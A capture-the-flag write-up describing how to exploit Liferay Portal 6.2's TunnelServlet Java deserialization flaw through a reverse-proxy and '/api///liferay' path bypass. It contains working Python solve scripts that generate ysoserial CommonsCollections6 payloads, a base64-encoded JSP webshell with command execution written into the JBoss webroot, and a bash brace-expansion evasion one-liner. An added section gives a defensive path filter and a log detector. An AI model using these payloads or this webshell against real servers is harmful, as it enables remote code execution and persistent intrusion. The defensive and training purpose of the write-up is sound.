- The challenge uses Liferay Portal 6.2 on jboss-7.1.1, a Liferay version with quite a few exploitable CVEs.

- Because the challenge runs in an internal network, deserialization CVEs whose gadget chains rely on RMI or similar outbound connections are ruled out.
```yaml
    networks:
      - internal_network
networks:
  internal_network:
    driver: bridge
```
- Liferay TunnelServlet Deserialization Remote Code Execution (LPE-15538) is the vulnerability that can be used here. `/api/liferay` and `/api/spring` deserialize an object from the POST request body, but these servlets are only reachable from localhost.
- If the server is misconfigured, for example with a reverse proxy in front of the web server, a request forwarded to Liferay is treated as if it came from localhost, so the endpoint becomes accessible and therefore exploitable:


- Bypassing the restricting configuration:

- Use [ysoserial](https://github.com/frohoff/ysoserial.git) to generate a CommonsCollections6 gadget chain, then POST the data to the API at `/api///liferay`; solve script:
```python
import requests
import os

URL = "http://localhost:8080"
# Generate the CommonsCollections6 gadget chain with ysoserial ([path] is the elided local path).
os.system('java -jar "D:/[path]/ysoserial-all.jar" CommonsCollections6 "touch /tmp/test" > a.bin')
# POST the serialized object to the tunnel servlet; the extra slashes get past the path restriction.
with open("a.bin", "rb") as f:
    r = requests.post(URL + "/api///liferay", data=f)
print(r.text)
```
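The two weaknesses above (a localhost-only servlet exposed through a proxy hop, and a path filter defeated by `/api///liferay`) are what a defender needs to catch. The following is an added example, not code from the write-up: it shows why an exact-match path filter misses the repeated-slash form, a hardened check that canonicalises the path first, and a small detector run over constructed access-log lines in an assumed format (`remote method path status xff="..."`) that flags tunnel-servlet requests whose real origin, taken from X-Forwarded-For, is not loopback.

```python
import posixpath
import re
from urllib.parse import urlsplit, unquote

# Servlet paths that Liferay 6.2 intends to expose only to localhost (from the write-up).
TUNNEL_ENDPOINTS = {"/api/liferay", "/api/spring"}


def normalize_path(raw_path: str) -> str:
    """Canonicalise a request path the way the container will route it:
    drop the query string, percent-decode once, collapse repeated slashes and
    resolve '.' / '..' segments. '/api///liferay' and '/api/liferay' end up equal."""
    path = unquote(urlsplit(raw_path).path)
    path = re.sub(r"/{2,}", "/", path)        # collapse '///' before normpath (it keeps a leading '//')
    path = posixpath.normpath(path)
    if not path.startswith("/"):
        path = "/" + path
    return path


def naive_is_blocked(raw_path: str) -> bool:
    # The weak filter: exact string comparison on the raw request path.
    return raw_path in TUNNEL_ENDPOINTS


def hardened_is_blocked(raw_path: str) -> bool:
    # Compare the canonical form instead, so slash padding and dot segments do not matter.
    return normalize_path(raw_path) in TUNNEL_ENDPOINTS


# Assumed log line layout for this example: remote-addr method path status xff="<X-Forwarded-For>"
LOG_RE = re.compile(
    r'^(?P<remote>\S+) (?P<method>[A-Z]+) (?P<path>\S+) (?P<status>\d{3}) xff="(?P<xff>[^"]*)"$'
)

# Constructed sample lines (not from the page): Liferay sits behind a reverse proxy, so every
# remote address is 127.0.0.1 and the real client is only visible in X-Forwarded-For.
SAMPLE_LOG = """\
127.0.0.1 GET /web/guest/home 200 xff="203.0.113.7"
127.0.0.1 POST /api///liferay 200 xff="203.0.113.7"
127.0.0.1 POST /api/spring 200 xff="198.51.100.3"
127.0.0.1 POST /api/liferay 200 xff=""
127.0.0.1 GET /api/jsonws 200 xff="203.0.113.7"
"""


def is_loopback(addr: str) -> bool:
    return addr in ("127.0.0.1", "::1", "localhost")


def find_tunnel_abuse(log_text: str):
    """Return (method, raw path, origin) for tunnel-servlet requests that did not
    originate on the host itself. An empty X-Forwarded-For with a loopback remote
    address is a genuine local call and is left alone."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        if not hardened_is_blocked(m["path"]):
            continue
        # First X-Forwarded-For hop is the original client; fall back to the socket address.
        origin = m["xff"].split(",")[0].strip() if m["xff"] else m["remote"]
        if not is_loopback(origin):
            hits.append((m["method"], m["path"], origin))
    return hits


if __name__ == "__main__":
    print("naive filter blocks /api///liferay:", naive_is_blocked("/api///liferay"))
    print("hardened filter blocks /api///liferay:", hardened_is_blocked("/api///liferay"))
    for hit in find_tunnel_abuse(SAMPLE_LOG):
        print("tunnel servlet reached via proxy:", hit)
```

Running it shows the naive check letting `/api///liferay` through while the hardened one blocks it, and the detector reporting the two proxied POSTs but not the local one. Enforcing the same rule at the proxy (deny anything that canonicalises to `/api/liferay` or `/api/spring`) removes the misconfiguration the write-up relies on.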

- Since there is no outbound connectivity, we can instead create a webshell in the webroot
`/opt/liferay-portal-6.2-ce-ga3/jboss-7.1.1/standalone/deployments/ROOT.war`
- Payload command to create the webshell:
```bash
echo PCVAIHBhZ2UgaW1wb3J0PSJqYXZhLnV0aWwuKixqYXZhLmlvLioiICU+CjwlCiU+CjxIVE1MPgogICAgPEJPRFk+CiAgICAgICAgPEgzPkpTUCBTSEVMTDwvSDM+CiAgICAgICAgPEZPUk0gTUVUSE9EPSJQT1NUIiBOQU1FPSJteWZvcm0iIEFDVElPTj0iIj4KICAgICAgICAgICAgPElOUFVUIFRZUEU9InBhc3N3b3JkIiBOQU1FPSJwYXNzd29yZCI+CiAgICAgICAgICAgIDxJTlBVVCBUWVBFPSJ0ZXh0IiBOQU1FPSJjbWQiPgogICAgICAgICAgICA8SU5QVVQgVFlQRT0ic3VibWl0IiBWQUxVRT0iRXhlY3V0ZSI+CiAgICAgICAgPC9GT1JNPgogICAgICAgIDxQUkU+CiAgICAgICAgPCUKICAgICAgICBpZiAoInp6enp6eiIuZXF1YWxzKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwYXNzd29yZCIpKSkgewogICAgICAgICAgICBpZiAocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpICE9IG51bGwpIHsKICAgICAgICAgICAgICAgIG91dC5wcmludGxuKCJDb21tYW5kOiAiICsgcmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpICsgIjxCUj4iKTsKICAgICAgICAgICAgICAgIFByb2Nlc3MgcCA9IFJ1bnRpbWUuZ2V0UnVudGltZSgpLmV4ZWMocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKTsKICAgICAgICAgICAgICAgIE91dHB1dFN0cmVhbSBvcyA9IHAuZ2V0T3V0cHV0U3RyZWFtKCk7CiAgICAgICAgICAgICAgICBJbnB1dFN0cmVhbSBpbiA9IHAuZ2V0SW5wdXRTdHJlYW0oKTsKICAgICAgICAgICAgICAgIERhdGFJbnB1dFN0cmVhbSBkaXMgPSBuZXcgRGF0YUlucHV0U3RyZWFtKGluKTsKICAgICAgICAgICAgICAgIFN0cmluZyBkaXNyID0gZGlzLnJlYWRMaW5lKCk7CiAgICAgICAgICAgICAgICB3aGlsZSAoIGRpc3IgIT0gbnVsbCApIHsKICAgICAgICAgICAgICAgICAgICBvdXQucHJpbnRsbihkaXNyKTsKICAgICAgICAgICAgICAgICAgICBkaXNyID0gZGlzLnJlYWRMaW5lKCk7CiAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgIH0KICAgICAgICB9IGVsc2UgewogICAgICAgICAgICBvdXQucHJpbnRsbigiSW5jb3JyZWN0IHBhc3N3b3JkIik7CiAgICAgICAgfQogICAgICAgICU+CiAgICAgICAgPC9QUkU+CiAgICA8L0JPRFk+CjwvSFRNTD4K | base64 -d > /opt/liferay-portal-6.2-ce-ga3/jboss-7.1.1/standalone/deployments/ROOT.war/nammh.jsp
```
- Use `bash -c {echo,b64}|{base64,-d}|{bash,-i}` to get the pipeline past Java's command handling; solve script that creates the webshell:
```python
import requests
import os

URL = "http://localhost:8080"
# <BASE64_PAYLOAD> stands for the base64 blob from the webshell command above (removed from the page).
os.system('java -jar "D:/[path]/ysoserial-all.jar" CommonsCollections6 '
          '"bash -c {echo,<BASE64_PAYLOAD>}|{base64,-d}|{bash,-i}" > a.bin')
with open("a.bin", "rb") as f:
    r = requests.post(URL + "/api///liferay", data=f)
print(r.text)
```
- Webshell created successfully:

- Get the flag:
